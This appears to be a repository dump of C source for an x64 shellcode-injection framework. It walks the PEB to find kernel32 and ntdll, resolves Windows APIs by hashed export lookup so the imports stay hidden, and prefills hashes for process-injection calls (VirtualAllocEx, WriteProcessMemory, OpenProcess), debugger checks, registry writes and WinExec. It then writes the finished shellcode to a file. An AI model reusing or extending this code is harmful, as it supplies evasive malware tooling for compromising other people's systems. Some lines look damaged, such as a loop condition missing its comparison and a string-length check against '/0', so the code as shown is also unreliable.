332 | PWORD lpwOrd;
333 | PDWORD lpdwFunName;
334 | PDWORD lpdwFunAddr;
335 | DWORD dwLoop;
336 |
337 | lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
338 | if(lpDosHeader->e_magic != IMAGE_DOS_SIGNATURE) return pRet;
339 |
340 | lpNtHeaders = (PIMAGE_NT_HEADERS)((DWORD64)hModuleBase + lpDosHeader->e_lfanew);
341 |
342 | if(lpNtHeaders->Signature != IMAGE_NT_SIGNATURE) return pRet;
343 |
344 | if(!lpNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) return pRet;
345 | if(!lpNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) return pRet;
346 |
347 | lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD64)hModuleBase + (DWORD)lpNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
348 |
349 | if(!lpExports->NumberOfNames) return pRet;
350 |
351 | lpdwFunName = (PDWORD)((DWORD64)hModuleBase + (DWORD)lpExports->AddressOfNames);
352 |
353 | lpwOrd = (PWORD)((DWORD64)hModuleBase + (DWORD)lpExports->AddressOfNameOrdinals);
354 |
355 | lpdwFunAddr = (PDWORD)((DWORD64)hModuleBase + (DWORD)lpExports->AddressOfFunctions);
356 |
357 | for(dwLoop=0;dwLoopNumberOfNames - 1;dwLoop++)
358 | {
359 |
360 |
361 | if(GetRolHash( (char *)(lpdwFunName[dwLoop] + (DWORD64)hModuleBase)) == dwNameHash )
362 | {
363 | if(lpGetAddr)
364 | {
365 | xGetProcAddress = (TGetProcAddress)lpGetAddr;
366 | pRet = xGetProcAddress(hModuleBase, (char *)(lpwOrd[dwLoop] + (DWORD)lpExports->Base));
367 | }
368 | else
369 | {
370 |
371 | pRet = (FARPROC)(lpdwFunAddr[lpwOrd[dwLoop]] + (DWORD64)hModuleBase);
372 | }
373 | break;
374 | }
375 | }
376 | return pRet;
377 | }
378 |
379 |
380 |
381 |
382 | BOOL GetRing3ApiAddr()
383 | {
384 | HMODULE hModuleBase;
385 | HMODULE hNtdllBase;
386 | HANDLE hPsapiBase;
387 | HANDLE hAdvapi32;
388 | DWORD dw_temp_hash=0;
389 | char advapi32[]={'a','d','v','a','p','i','3','2','.','d','l','l',0};
390 | char psapi[]={'p','s','a','p','i','.','d','l','l',0};
391 | #ifndef HHL_DEBUG
392 | PShellData lpData= (PShellData)((ULONG64)Shellcode_Final_End);//生成shellcode时候恢复回来
393 | #endif
394 |
395 | if(lpData->bIsInitSucess == TRUE)
396 | {
397 | return TRUE;
398 | }
399 |
400 | hModuleBase = (HMODULE)get_kernel32_peb_64();
401 | lpData->base_ker32=hModuleBase;
402 | hNtdllBase =(HMODULE)get_ntdll_peb_64();
403 | lpData->base_ntdll=hNtdllBase;
404 |
405 | if(hModuleBase == NULL || hNtdllBase == NULL)
406 | {
407 | return FALSE;
408 | }
409 |
410 | lpData->xGetProcAddress = (TGetProcAddress) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xGetProcAddress, NULL);
411 | if(lpData->xGetProcAddress == NULL)
412 | {
413 | return FALSE;
414 | }
415 | lpData->xLoadLibraryA =(TLoadLibraryA) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xLoadLibraryA, lpData->xGetProcAddress);
416 | if(lpData->xLoadLibraryA == NULL)
417 | {
418 | return FALSE;
419 | }
420 | hPsapiBase=(lpData->xLoadLibraryA)(psapi);// Get Psapi.dll Module Base 如果注入的时机太早这里可能会出问题 load psapi 加载不进来
421 | hAdvapi32=(lpData->xLoadLibraryA)(advapi32);// Get advapi32.dll Module Base 如果注入的时机太早这里可能会出问题 load psapi 加载不进来
422 | lpData->base_psapi=hPsapiBase;
423 | lpData->base_advapi32=hAdvapi32;
424 | lpData->xRegCreateKeyExW=(TRegCreateKeyExW)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegCreateKeyExW,lpData->xGetProcAddress);
425 | lpData->xRegSetValueExW=(TRegSetValueExW)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegSetValueExW,lpData->xGetProcAddress);
426 | lpData->xRegSetValueExA=(TRegSetValueExA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegSetValueExA,lpData->xGetProcAddress);
427 | lpData->xRegCloseKey=(TRegCloseKey)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegCloseKey,lpData->xGetProcAddress);
428 | lpData->xRegOpenKeyA=(TRegOpenKeyA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegOpenKeyA,lpData->xGetProcAddress);
429 | lpData->xRegOpenKeyExA=(TRegOpenKeyExA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegOpenKeyExA,lpData->xGetProcAddress);
430 | lpData->xRegQueryValueExA=(TRegQueryValueExA)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegQueryValueExA,lpData->xGetProcAddress);
431 | lpData->xRegQueryValueExW=(TRegQueryValueExW)Hash_GetProcAddress(hAdvapi32,(DWORD)lpData->xRegQueryValueExW,lpData->xGetProcAddress);
432 |
433 |
434 | lpData->xGetProcessImageFileNameA=(TGetProcessImageFileNameA)Hash_GetProcAddress(hPsapiBase,(DWORD)lpData->xGetProcessImageFileNameA,lpData->xGetProcAddress);
435 |
436 | lpData->xCreateFileA=(TCreateFileA)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xCreateFileA,lpData->xGetProcAddress);
437 | lpData->xCreateFileW=(TCreateFileW)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xCreateFileW,lpData->xGetProcAddress);
438 | lpData->xCreateFileMappingA=(TCreateFileMappingA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateFileMappingA,lpData->xGetProcAddress);
439 | lpData->xCloseHandle=(TCloseHandle)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCloseHandle,lpData->xGetProcAddress);
440 | lpData->xCreateToolhelp32Snapshot=(TCreateToolhelp32Snapshot)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateToolhelp32Snapshot,lpData->xGetProcAddress);
441 | lpData->xCheckRemoteDebuggerPresent=(TCheckRemoteDebuggerPresent)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCheckRemoteDebuggerPresent,lpData->xGetProcAddress);
442 | lpData->xCreateHardLinkA=(TCreateHardLinkA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateHardLinkA,lpData->xGetProcAddress);
443 | lpData->xCreateHardLinkW=(TCreateHardLinkW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateHardLinkW,lpData->xGetProcAddress);
444 | lpData->xCreateDirectoryA=(TCreateDirectoryA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateDirectoryA,lpData->xGetProcAddress);
445 | lpData->xCreateDirectoryW=(TCreateDirectoryW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCreateDirectoryW,lpData->xGetProcAddress);
446 |
447 |
448 | lpData->xCopyFileA=(TCopyFileA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCopyFileA,lpData->xGetProcAddress);
449 | lpData->xCopyFileW=(TCopyFileW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xCopyFileW,lpData->xGetProcAddress);
450 |
451 | lpData->xDeleteFileA=(TDeleteFileA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xDeleteFileA,lpData->xGetProcAddress);
452 | lpData->xDeleteFileW=(TDeleteFileW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xDeleteFileW,lpData->xGetProcAddress);
453 |
454 | lpData->xFindResourceA=(TFindResourceA)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xFindResourceA,lpData->xGetProcAddress);
455 |
456 | lpData->xGlobalFree=(TGlobalFree)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xGlobalFree,lpData->xGetProcAddress);
457 | lpData->xGetCurrentProcess=(TGetCurrentProcess)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetCurrentProcess,lpData->xGetProcAddress);
458 | lpData->xGetFileSize=(TGetFileSize)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetFileSize,lpData->xGetProcAddress);
459 | lpData->xGetProcessHeap=(TGetProcessHeap)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetProcessHeap,lpData->xGetProcAddress);
460 | lpData->xGetSystemDirectoryA=(TGetSystemDirectoryA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetSystemDirectoryA,lpData->xGetProcAddress);
461 | lpData->xGetSystemDirectoryW=(TGetSystemDirectoryW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetSystemDirectoryW,lpData->xGetProcAddress);
462 | lpData->xGetModuleHandleA=(TGetModuleHandleA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetModuleHandleA,lpData->xGetProcAddress);
463 | lpData->xGetLastError=(TGetLastError)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetLastError,lpData->xGetProcAddress);
464 | lpData->xGetStartupInfoA=(TGetStartupInfoA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetStartupInfoA,lpData->xGetProcAddress);
465 | lpData->xGetTickCount=(TGetTickCount)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetTickCount,lpData->xGetProcAddress);
466 | lpData->xGetCurrentProcessId=(TGetCurrentProcessId)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetCurrentProcessId,lpData->xGetProcAddress);
467 | lpData->xGetNativeSystemInfo=(TGetNativeSystemInfo)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetNativeSystemInfo,lpData->xGetProcAddress);
468 | lpData->xGetModuleFileNameA=(TGetModuleFileNameA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetModuleFileNameA,lpData->xGetProcAddress);
469 | lpData->xGetShortPathNameA=(TGetShortPathNameA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetShortPathNameA,lpData->xGetProcAddress);
470 | lpData->xGetEnvironmentVariableA=(TGetEnvironmentVariableA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetEnvironmentVariableA,lpData->xGetProcAddress);
471 | lpData->xGetEnvironmentVariableW=(TGetEnvironmentVariableW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetEnvironmentVariableW,lpData->xGetProcAddress);
472 | lpData->xGetPrivateProfileStringA=(TGetPrivateProfileStringA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetPrivateProfileStringA,lpData->xGetProcAddress);
473 | lpData->xGetPrivateProfileStringW=(TGetPrivateProfileStringW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xGetPrivateProfileStringW,lpData->xGetProcAddress);
474 |
475 | lpData->xHeapAlloc=(THeapAlloc)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xHeapAlloc,lpData->xGetProcAddress);
476 | lpData->xHeapFree=(THeapFree)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xHeapFree,lpData->xGetProcAddress);
477 |
478 | lpData->xIsDebuggerPresent=(TIsDebuggerPresent)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xIsDebuggerPresent,lpData->xGetProcAddress);
479 |
480 | lpData->xLoadResource=(TLoadResource)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xLoadResource,lpData->xGetProcAddress);
481 | lpData->xLockResource=(TLockResource)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xLockResource,lpData->xGetProcAddress);
482 |
483 | lpData->xMoveFileA=(TMoveFileA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileA,lpData->xGetProcAddress);
484 | lpData->xMoveFileW=(TMoveFileW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileW,lpData->xGetProcAddress);
485 | lpData->xMoveFileExA=(TMoveFileExA)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileExA,lpData->xGetProcAddress);
486 | lpData->xMoveFileExW=(TMoveFileExW)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMoveFileExW,lpData->xGetProcAddress);
487 |
488 | lpData->xMapViewOfFile=(TMapViewOfFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMapViewOfFile,lpData->xGetProcAddress);
489 | lpData->xMultiByteToWideChar=(TMultiByteToWideChar)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xMultiByteToWideChar,lpData->xGetProcAddress);
490 |
491 | lpData->xNtCreateFile=(TNtCreateFile)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xNtCreateFile,lpData->xGetProcAddress);
492 |
493 | lpData->xOutputDebugStringA =(TOutputDebugStringA) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xOutputDebugStringA,lpData->xGetProcAddress);
494 | lpData->xOpenProcess =(TOpenProcess) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xOpenProcess,lpData->xGetProcAddress);
495 |
496 | lpData->xProcess32First =(TProcess32First) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xProcess32First,lpData->xGetProcAddress);
497 | lpData->xProcess32Next =(TProcess32Next) Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xProcess32Next,lpData->xGetProcAddress);
498 |
499 | lpData->xReadFile=(TReadFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xReadFile,lpData->xGetProcAddress);
500 | lpData->xRtlInitAnsiString=(TRtlInitAnsiString)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlInitAnsiString,lpData->xGetProcAddress);
501 | lpData->xRtlAnsiStringToUnicodeString=(TRtlAnsiStringToUnicodeString)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlAnsiStringToUnicodeString,lpData->xGetProcAddress);
502 | lpData->xRtlAllocateHeap=(TRtlAllocateHeap)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlAllocateHeap,lpData->xGetProcAddress);
503 | lpData->xRtlFreeHeap=(TRtlFreeHeap)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlFreeHeap,lpData->xGetProcAddress);
504 | lpData->xRtlGetVersion=(TRtlGetVersion)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlGetVersion,lpData->xGetProcAddress);//xRtlFreeUnicodeString
505 | lpData->xRtlFreeUnicodeString=(TRtlFreeUnicodeString)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlFreeUnicodeString,lpData->xGetProcAddress);
506 | lpData->xRtlZeroMemory=(TRtlZeroMemory)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlZeroMemory,lpData->xGetProcAddress);
507 | lpData->xRtlImageDirectoryEntryToData=(TRtlImageDirectoryEntryToData)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlImageDirectoryEntryToData,lpData->xGetProcAddress);
508 |
509 | lpData->xRtlFormatCurrentUserKeyPath=(TRtlFormatCurrentUserKeyPath)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xRtlFormatCurrentUserKeyPath,lpData->xGetProcAddress);
510 | lpData->xReadProcessMemory=(TReadProcessMemory)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xReadProcessMemory,lpData->xGetProcAddress);
511 |
512 | lpData->xSizeofResource=(TSizeofResource)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xSizeofResource,lpData->xGetProcAddress);
513 | lpData->xSleep=(TSleep)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xSleep,lpData->xGetProcAddress);
514 | lpData->xSetFilePointer=(TSetFilePointer)Hash_GetProcAddress(hModuleBase, (DWORD)lpData->xSetFilePointer,lpData->xGetProcAddress);
515 |
516 | lpData->xUnmapViewOfFile=(TUnmapViewOfFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xUnmapViewOfFile,lpData->xGetProcAddress);
517 |
518 | lpData->xVirtualAlloc=(TVirtualAlloc)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualAlloc,lpData->xGetProcAddress);
519 | lpData->xVirtualFree=(TVirtualFree)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualFree,lpData->xGetProcAddress);
520 |
521 | lpData->xVirtualAllocEx=(TVirtualAllocEx)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualAllocEx,lpData->xGetProcAddress);
522 | lpData->xVirtualFreeEx=(TVirtualFreeEx)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualFreeEx,lpData->xGetProcAddress);
523 | lpData->xVirtualProtectEx=(TVirtualProtectEx)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualProtectEx,lpData->xGetProcAddress);
524 | lpData->xVirtualProtect=(TVirtualProtect)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xVirtualProtect,lpData->xGetProcAddress);
525 |
526 | lpData->xWideCharToMultiByte=(TWideCharToMultiByte)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWideCharToMultiByte,lpData->xGetProcAddress);
527 | lpData->xWriteFile=(TWriteFile)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWriteFile,lpData->xGetProcAddress);
528 | lpData->xWinExec=(TWinExec)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWinExec,lpData->xGetProcAddress);
529 | lpData->xWriteProcessMemory=(TWriteProcessMemory)Hash_GetProcAddress(hModuleBase,(DWORD)lpData->xWriteProcessMemory,lpData->xGetProcAddress);
530 |
531 | lpData->xZwQuerySystemInformation=(TZwQuerySystemInformation)Hash_GetProcAddress(hNtdllBase,(DWORD)lpData->xZwQuerySystemInformation,lpData->xGetProcAddress);
532 | lpData->bIsInitSucess = TRUE;
533 | return TRUE;
534 | }
535 |
536 |
537 | void InitApiHashToStruct()
538 | {
539 |
540 | HANDLE hFile;
541 | DWORD dwBytes, dwSize,dwShellCodeSize;
542 | PUCHAR lpBuffer;
543 | DWORD dw_error=0;
544 | BOOL b1=0;
545 |
546 |
547 | ZeroMemory(&ShellData,sizeof(TShellData));
548 |
549 | ShellData.bIsInitSucess = FALSE;
550 |
551 | //填充函数名字字符串的hash到 ShellData全局结构体里面
552 | ShellData.xCreateFileA=(TCreateFileA)0x94e43293;//
553 | ShellData.xCreateFileW=(TCreateFileW)0x94e432a9;
554 | ShellData.xCreateFileMappingA=(TCreateFileMappingA)0x014b19c2;
555 | ShellData.xCloseHandle=(TCloseHandle)0xff0d6657;//
556 | ShellData.xCreateToolhelp32Snapshot=(TCreateToolhelp32Snapshot)0x3cc0153d;
557 | ShellData.xCheckRemoteDebuggerPresent=(TCheckRemoteDebuggerPresent)0x1a2789fe;
558 | ShellData.xCreateHardLinkA=(TCreateHardLinkA)0x77a742b;
559 | ShellData.xCreateHardLinkW=(TCreateHardLinkW)0x77a7441;
560 | ShellData.xCopyFileA=(TCopyFileA)0x7eb0fb1;
561 | ShellData.xCopyFileW=(TCopyFileW)0x7eb0fc7;
562 | ShellData.xCreateDirectoryA=(TCreateDirectoryA)0xa66b05d4;
563 | ShellData.xCreateDirectoryW=(TCreateDirectoryW)0xa66b05ea;
564 |
565 | ShellData.xDeleteFileA=(TDeleteFileA)0x98e63979;
566 | ShellData.xDeleteFileW=(TDeleteFileW)0x98e6398f;
567 |
568 | ShellData.xFindResourceA=(TFindResourceA)0x83ceca69;
569 |
570 | ShellData.xGlobalFree=(TGlobalFree)0x048223c0;
571 | ShellData.xGetProcAddress = (TGetProcAddress)0xbbafdf85;
572 | ShellData.xGetCurrentProcess=(TGetCurrentProcess)0x3a2fe6bb;
573 | ShellData.xGetFileSize=(TGetFileSize)0xac0a138e;
574 | ShellData.xGetProcessHeap=(TGetProcessHeap)0x80ae9074;
575 | ShellData.xGetSystemDirectoryA=(TGetSystemDirectoryA)0x8e6902b2;
576 | ShellData.xGetSystemDirectoryW=(TGetSystemDirectoryW)0x8e6902c8;
577 | ShellData.xGetModuleHandleA=(TGetModuleHandleA)0xf4e2f2b2;
578 | ShellData.xGetProcessImageFileNameA=(TGetProcessImageFileNameA)0x34ef0e5a;
579 | ShellData.xGetLastError=(TGetLastError)0x12f461bb;
580 | ShellData.xGetStartupInfoA=(TGetStartupInfoA)0x8fb53455;
581 | ShellData.xGetTickCount=(TGetTickCount)0xed04519b;
582 | ShellData.xGetCurrentProcessId=(TGetCurrentProcessId)0x2cece924;
583 | ShellData.xGetNativeSystemInfo=(TGetNativeSystemInfo)0x8a1fb2a8;
584 | ShellData.xGetModuleFileNameA=(TGetModuleFileNameA)0xb4ffafed;
585 | ShellData.xGetShortPathNameA=(TGetShortPathNameA)0xe72d6895;
586 | ShellData.xGetEnvironmentVariableA=(TGetEnvironmentVariableA)0xec496a9e;
587 | ShellData.xGetEnvironmentVariableW=(TGetEnvironmentVariableW)0xec496ab4;
588 | ShellData.xGetPrivateProfileStringA=(TGetPrivateProfileStringA)0x8f9ded68;
589 | ShellData.xGetPrivateProfileStringW=(TGetPrivateProfileStringW)0x8f9ded7e;
590 |
591 |
592 | ShellData.xHeapAlloc=(THeapAlloc)0xf8262c81;
593 | ShellData.xHeapFree=(THeapFree)0x052e3772;
594 |
595 | ShellData.xIsDebuggerPresent=(TIsDebuggerPresent)0xb483154;
596 |
597 | ShellData.xLoadResource=(TLoadResource)0xff951427;
598 | ShellData.xLockResource=(TLockResource)0xff951b2b;
599 | ShellData.xLoadLibraryA = (TLoadLibraryA)0x0c917432;
600 |
601 | ShellData.xMapViewOfFile=(TMapViewOfFile)0x9aa5f07d;
602 | ShellData.xMultiByteToWideChar=(TMultiByteToWideChar)0x70229207;
603 | ShellData.xMoveFileA=(TMoveFileA)0x896b19ae;
604 | ShellData.xMoveFileW=(TMoveFileW)0x896b19c4;
605 | ShellData.xMoveFileExA=(TMoveFileExA)0x56ca25ee;
606 | ShellData.xMoveFileExW=(TMoveFileExW)0x56ca2604;
607 |
608 | ShellData.xNtCreateFile=(TNtCreateFile)0x4489294c;
609 |
610 | ShellData.xOutputDebugStringA = (TOutputDebugStringA)0x354c31f2;
611 | ShellData.xOpenProcess=(TOpenProcess)0x77ce8553;
612 |
613 | ShellData.xProcess32First=(TProcess32First)0xc4446aa6;
614 | ShellData.xProcess32Next=(TProcess32Next)0x2e255963;
615 |
616 | ShellData.xRtlGetVersion=(TRtlGetVersion)0x4907252b;
617 | ShellData.xRtlFreeUnicodeString=(TRtlFreeUnicodeString)0x07d63e06;
618 | ShellData.xRtlZeroMemory=(TRtlZeroMemory)0x555df489;
619 | ShellData.xRtlInitAnsiString=(TRtlInitAnsiString)0x65c26f71;
620 | ShellData.xRtlAnsiStringToUnicodeString=(TRtlAnsiStringToUnicodeString)0x199548c2;
621 | ShellData.xRtlAllocateHeap=(TRtlAllocateHeap)0x8e17053d;
622 | ShellData.xRtlFreeHeap=(TRtlFreeHeap)0xc839b3b6;
623 | ShellData.xRtlImageDirectoryEntryToData=(TRtlImageDirectoryEntryToData)0xc1eb7ae3;
624 | ShellData.xReadFile=(TReadFile)0x130f36b2;
625 | ShellData.xReadProcessMemory=(TReadProcessMemory)0xd5206133;
626 |
627 |
628 | ShellData.xRtlFormatCurrentUserKeyPath=(TRtlFormatCurrentUserKeyPath)0x29640660;
629 | ShellData.xRegCreateKeyExW=(TRegCreateKeyExW)0xb4b0ad31;
630 | ShellData.xRegSetValueExW=(TRegSetValueExW)0xd8c0fec0;
631 | ShellData.xRegCloseKey=(TRegCloseKey)0xe511783;
632 | ShellData.xRegOpenKeyA=(TRegOpenKeyA)0xf7be46f9;
633 | ShellData.xRegOpenKeyExA=(TRegOpenKeyExA)0xbf7df3b;
634 | ShellData.xRegSetValueExA=(TRegSetValueExA)0xd8c0feaa;
635 | ShellData.xRegQueryValueExA=(TRegQueryValueExA)0x8a2fc67e;
636 | ShellData.xRegQueryValueExW=(TRegQueryValueExW)0x8a2fc694;
637 |
638 | ShellData.xSizeofResource=(TSizeofResource)0xd90bb0a3;
639 | ShellData.xSleep=(TSleep)0xcb9765a0;
640 | ShellData.xSetFilePointer=(TSetFilePointer)0xdbacbe43;
641 |
642 | ShellData.xUnmapViewOfFile=(TUnmapViewOfFile)0xdaa7fe52;
643 |
644 | ShellData.xVirtualAllocEx=(TVirtualAllocEx)0xef9c7bf1;
645 | ShellData.xVirtualFreeEx=(TVirtualFreeEx)0x3215858b;
646 | ShellData.xVirtualProtectEx=(TVirtualProtectEx)0x1a7bbe0b;
647 | ShellData.xVirtualAlloc=(TVirtualAlloc)0x1ede5967;
648 | ShellData.xVirtualFree=(TVirtualFree)0x6144aa05;
649 | ShellData.xVirtualProtect=(TVirtualProtect)0xef64a41e;
650 |
651 | ShellData.xWideCharToMultiByte=(TWideCharToMultiByte)0xcb9bd550;
652 | ShellData.xWriteFile=(TWriteFile)0x741f8dc4;
653 | ShellData.xWinExec=(TWinExec)0x1a22f51;
654 | ShellData.xWriteProcessMemory=(TWriteProcessMemory)0x97410f58;
655 |
656 | ShellData.xZwQuerySystemInformation=(TZwQuerySystemInformation)0xeffc1cf8;
657 |
658 | #ifndef HHL_DEBUG
659 | dwSize = (DWORD)((ULONG64)Shellcode_Final_End - (ULONG64)Shellcode_Final_Start);
660 |
661 | dwShellCodeSize = dwSize + sizeof(TShellData);
662 |
663 | lpBuffer = (PUCHAR)GlobalAlloc(GMEM_FIXED,dwShellCodeSize);
664 | if(lpBuffer)
665 | {
666 | CopyMemory(lpBuffer,Shellcode_Final_Start,dwSize);
667 | CopyMemory(lpBuffer+dwSize,&ShellData,sizeof(TShellData));
668 |
669 | hFile = CreateFileA("c:\\64shellcode.bin", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
670 |
671 | if(hFile != INVALID_HANDLE_VALUE)
672 | {
673 | if(WriteFile(hFile,lpBuffer,dwShellCodeSize,&dwBytes,NULL))
674 | {
675 | printf("Save ShellCode Success.\n");
676 | }
677 | CloseHandle(hFile);
678 | }
679 | GlobalFree(lpBuffer);
680 | }
681 | #endif
682 | }
683 |
684 |
685 | void InitApiAddrToStruct()
686 | {
687 | InitApiHashToStruct();
688 | //AlignRSPAndCallShEntry();
689 |
690 | }
691 |
692 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode_ntapi_utility.c:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | #include "64shellcode.h"
5 | #include "64shellcode_ntapi_utility.h"
6 | #include "64nativeapi.h"
7 |
8 |
9 | //注意写shellcode关闭 security cookie
10 |
11 | #define Shellcode_Final_End ShellCode_Ntapi_Utility_End
12 |
13 | #ifdef HHL_DEBUG
14 | extern PShellData lpData;
15 | #else
16 |
17 | #endif
18 |
19 | int sh_strlen(const char *str)
20 | {
21 | int len = 0;
22 | while (*str ++ != '/0')
23 | ++ len;
24 | return len;
25 | }
26 |
27 | int my_sh_strcmp(const char *dst, const char *src)
28 | {
29 | int ch1, ch2;
30 | do
31 | {
32 | if ( ((ch1 = (unsigned char)(*(dst++))) >= 'A') &&(ch1 <= 'Z') )
33 | ch1 += 0x20;
34 | if ( ((ch2 = (unsigned char)(*(src++))) >= 'A') &&(ch2 <= 'Z') )
35 | ch2 += 0x20;
36 | } while ( ch1 && (ch1 == ch2) );
37 | return(ch1 - ch2);
38 | }
39 |
40 | char * my_sh_strlwr(char *s)
41 | {
42 | char *str;
43 | char c1=0x0;
44 | str = s; //记录首地址位置,没有必要判断空值!
45 | while(*str != '\0')
46 | {
47 | c1=*str;
48 | if(*str > 'A' && *str < 'Z'){ //大写字母则进行转换!
49 | *str += 'a'-'A';
50 | }
51 | str++;
52 | }
53 | return s;
54 | }
55 |
56 | char * my_sh_strupr(char *str)
57 | {
58 | char *p = str;
59 | while (*p != 0)
60 | {
61 | if(*p >= 'a' && *p <= 'z')
62 | *p -= 0x20;
63 | p++;
64 | }
65 | return str;
66 | }
67 |
68 |
69 | char* my_sh_stristr(char* pString, char* pFind)
70 | {
71 | my_sh_strlwr(pString);
72 | my_sh_strlwr(pFind);
73 | return my_sh_strstr(pString,pFind);
74 | }
75 |
76 | int my_sh_strlen ( char* str )
77 | {
78 | int len=0;
79 | for (len = 0; *str; str++ )
80 | {
81 | len++;
82 | }
83 | return len;
84 |
85 | }
86 |
87 | int my_sh_stricmp(char *dst, char *src)//用于不区分大小写比较字符串是否相同
88 | {
89 | int ch1, ch2;
90 | do
91 | {
92 | if ( ((ch1 = (unsigned char)(*(dst++))) >= 'A') &&(ch1 <= 'Z') )
93 | ch1 += 0x20;
94 | if ( ((ch2 = (unsigned char)(*(src++))) >= 'A') &&(ch2 <= 'Z') )
95 | ch2 += 0x20;
96 | } while ( ch1 && (ch1 == ch2) );
97 | return(ch1 - ch2);
98 | }
99 |
100 |
101 | ULONG my_sh_wcslen (wchar_t * wcs)
102 | {
103 | const wchar_t *eos = wcs;
104 |
105 | while( *eos++ ) ;
106 |
107 | return( (ULONG)(eos - wcs - 1) );
108 | }
109 |
110 |
111 |
112 |
113 | char* my_sh_strstr (char * str1,char * str2)//搜素大小写敏感
114 | {
115 | char *cp = (char *) str1;
116 | char *s1, *s2;
117 |
118 | if ( !*str2 )
119 | return((char *)str1);
120 |
